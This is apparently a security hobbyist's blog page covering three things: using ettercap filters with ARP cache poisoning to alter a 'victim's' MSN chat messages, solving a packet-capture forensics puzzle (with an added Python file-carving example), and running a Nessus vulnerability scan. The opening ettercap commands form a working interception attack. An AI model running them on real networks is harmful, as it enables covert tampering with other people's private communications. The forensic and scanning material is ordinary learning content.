Next you need to compile msn.txt into a format that ettercap can understand:
# etterfilter -o msn.ef msn.txt

Now we are ready to run ettercap with our newly created filter.
# ettercap -Tq -M ARP:remote -i wlan0 -F msn.ef /victim_with_msn_ip/ /router_ip/

That's all. Now just wait for your victim to send or receive an 'lol' in the convo. Just like magic, 'lol' turns into 'smh'. Just note that when you type 'lol', it's gonna show up as 'lol' on your end, but on the other end of the convo it's gonna show up as 'smh', and vice versa. Now feel free to associate the words ettercap and awesome in the same sentence with ease.

In all my tests I found that you always have to perform a man in the middle attack (like ARP cache poisoning) to get the ettercap filters working. Without the ARP cache poisoning, the ettercap console will say that the filter ran, but my packets were not modified or affected.

Forensic contest: Puzzle #1

I found this interesting website that posts puzzles for interested individuals like myself to try and solve, with the possibility of winning prizes too. The URL is In this blog, I'm gonna show you how to solve puzzle #1.

1. Download the required pcap file, evidence.pcap, from the website
2. The first thing I did was open up the pcap file in Wireshark and apply a display filter to look at the traffic Ann's computer was involved in (ip.addr eq
3. Upon analysis of the first few packets I determined that the name of Ann's IM buddy was "Sec558user1"
4. I right clicked on the first packet then selected "Follow TCP Stream"
5. Upon further analysis, I determined that the first comment in the conversation was "Here's the secret recipe. I just downloaded it from the file server. Just copy to a thumb drive and you're good to go"
6. To find out the name of the file that was transferred, there are two methods I used.
  • Method 1 command: "# strings evidence.pcap | more". This method can take a while and is not the best, but eventually I saw the filename "recipe.docx"
  • Method 2. First I used tcpflow to separate the streams, then ran them through xxd.
    command: "# tcpflow -r evidence.pcap". I noticed a communication line between Ann's computer and another local but unknown IP of I then did "# xxd | more". Voila, recipe.docx is being sent to some unknown user using the OFT protocol
7. A simple Google search got me the necessary bytes being asked for, "50 4B 03 04"
8. Convert the necessary file to a PostScript-style plain hexdump for editing purposes: "# xxd -ps > hex.txt"
9. Open up the file in a text editor like Kate and search for the magic bytes "504b0304". When you find these bytes, remove everything before them, then save the file.
10. Run "# xxd -r -ps hex.txt > recipe.docx". This converts the hex file back into a raw binary file. Bingo, we have our original file
  • An alternate way to do this: "# xxd -s +256 | xxd -s -256 -r > recipe.docx"
11. Get the MD5 sum of the file: "# md5sum recipe.docx", 8350582774e1d4dbe1d61d64c89e0ea1 recipe.docx
12. Using MS Word to open the file you get:
Recipe for Disaster:
1 serving
4 cups sugar
2 cups water
In a medium saucepan, bring the water to a boil. Add sugar. Stir gently over low heat until sugar is fully dissolved. Remove the saucepan from heat. Allow to cool completely. Pour into gas tank. Repeat as necessary.
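Both puzzles come down to the same carving step: find the ZIP local-file header (50 4B 03 04) that every .docx starts with, either raw in the OFT stream (puzzle #1, steps 7 to 11 above) or in its base64 form "UEsD..." inside the SMTP body (puzzle #2 earlier on this page), cut everything before it, decode if needed, and hash the result. The Python below is an added example that does that for both cases without xxd or a text editor; it is not from the posts or from the contest site, and the sample streams, file names and addresses in it are constructed stand-ins, not the contest evidence. For the raw case it takes the rest of the stream as the file, exactly as the xxd steps do, so anything following the document in the same stream would still need trimming.

```python
import base64
import hashlib
import io
import re
import zipfile

ZIP_MAGIC = b"PK\x03\x04"     # 50 4B 03 04: the local-file header every .docx (an OOXML zip) starts with
B64_ZIP_MAGIC = b"UEsDB"      # base64 of those bytes: 50 4B 03 encode as "UEsD", the top bits of 04 as "B"
B64_RUN = re.compile(rb"[A-Za-z0-9+/=\r\n]+")   # a base64 body runs until a boundary line or other text

def carve_document(stream):
    """Return ("raw" | "base64", docx_bytes) for the first .docx found in a reassembled TCP stream."""
    raw_at = stream.find(ZIP_MAGIC)
    b64_at = stream.find(B64_ZIP_MAGIC)
    if raw_at != -1 and (b64_at == -1 or raw_at < b64_at):
        return "raw", stream[raw_at:]          # puzzle #1 style: the file travels as-is, so cut before it
    if b64_at == -1:
        raise ValueError("no .docx container found in stream")
    text = re.sub(rb"\s", b"", B64_RUN.match(stream, b64_at).group(0))
    text += b"=" * (-len(text) % 4)            # restore '=' padding if the body lost it
    data = base64.b64decode(text)
    if not data.startswith(ZIP_MAGIC):
        raise ValueError("base64 body did not decode to a ZIP container")
    return "base64", data                      # puzzle #2 style: MIME attachment

def md5_hex(data):
    return hashlib.md5(data).hexdigest()

def docx_entries(data):
    """Names inside the container; a successful listing is a cheap sanity check on the carve."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()

def _make_docx(text):
    """Build a minimal OOXML-like zip so the example runs without a real Word file (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        info = zipfile.ZipInfo("word/document.xml", date_time=(2009, 11, 25, 0, 0, 0))
        zf.writestr(info, f"<w:document><w:body><w:t>{text}</w:t></w:body></w:document>")
    return buf.getvalue()

# Constructed sample streams standing in for tcpflow output; nothing here is contest evidence.
SAMPLE_DOCX = _make_docx("constructed sample document")
SAMPLE_OFT_STREAM = b"OFT2" + b"\x00" * 28 + b"sample.docx\x00" + SAMPLE_DOCX     # raw transfer (puzzle #1 style)
SAMPLE_SMTP_STREAM = (                                                            # MIME attachment (puzzle #2 style)
    b"From: sender@example.invalid\r\nTo: recipient@example.invalid\r\n"
    b'Content-Type: multipart/mixed; boundary="XXBOUNDARY"\r\n\r\n--XXBOUNDARY\r\n'
    b"Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document\r\n"
    b"Content-Transfer-Encoding: base64\r\n\r\n"
    + base64.encodebytes(SAMPLE_DOCX)
    + b"--XXBOUNDARY--\r\n.\r\n"
)

if __name__ == "__main__":
    for name, stream in (("oft", SAMPLE_OFT_STREAM), ("smtp", SAMPLE_SMTP_STREAM)):
        kind, data = carve_document(stream)
        print(f"{name}: {kind}, {len(data)} bytes, md5={md5_hex(data)}, entries={docx_entries(data)}")
```

To use it on the real tcpflow output, read the stream file as bytes and pass it to carve_document(); the md5_hex() of the returned bytes is the value the puzzles ask for. The five-character marker "UEsDB" is safe to search for because the first four bytes of the ZIP header fully determine it, while the sixth base64 character already depends on the next byte of the file and so varies between documents.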


Nessus - Quick step by step to do a vulnerability scan

Nessus, in the network security realm, is a comprehensive vulnerability scanner that's free for non-commercial users. The entire goal of such a program is to aid a systems admin in identifying vulnerabilities on the systems tested.

A few examples taken from :

  • Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
  • Misconfiguration (e.g. open mail relay, missing patches, etc).
  • Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
  • Denials of service against the TCP/IP stack by using mangled packets
Nessus can run on both Windows and Linux systems. On Linux, it consists of the Nessus server, nessusd, which does the scanning, and the Nessus client, NessusClient (or nessus on some systems, I believe), which controls scans and presents the vulnerability results to the user.

I had a task in getting Nessus installed on BackTrack 4 but I'm not gonna get into that. Refer to the following link for instructions and don't ever forget your new best friend

BT4, 10.0.01:
# /etc/init.d/nessusd start
# cd /opt/nessus/bin
# ./NessusClient

On the 'Scan' tab click on the '+' button and enter in the host or range of hosts that you would like to scan by their respective IP addresses. Click on Save.

Click on the 'Connect' button at the bottom left of the screen. Click on the '+' button, then enter the required information (remember the host is gonna be and the port should remain 1241. The username and password would have been created in your Nessus setup stages). Click on Save. Click on Connect. NessusClient is gonna attempt to connect to the Nessus server at this point. Upon successful connectivity, you should have the right hand '+' button enabled (it would be disabled initially). Click on that '+' button. The next window should present you with a ton of options and settings at your disposal. I'd leave it up to you to determine what's right for you, but the defaults should be fine for now to get things up and running. Click on Save. Then click the Scan now button. You have now just performed a somewhat professional vulnerability audit of a system. When the scan is finished you will be presented with a report of Nessus's findings. What you do from here onwards is up to you and your little imagination.

Resources/Good reading: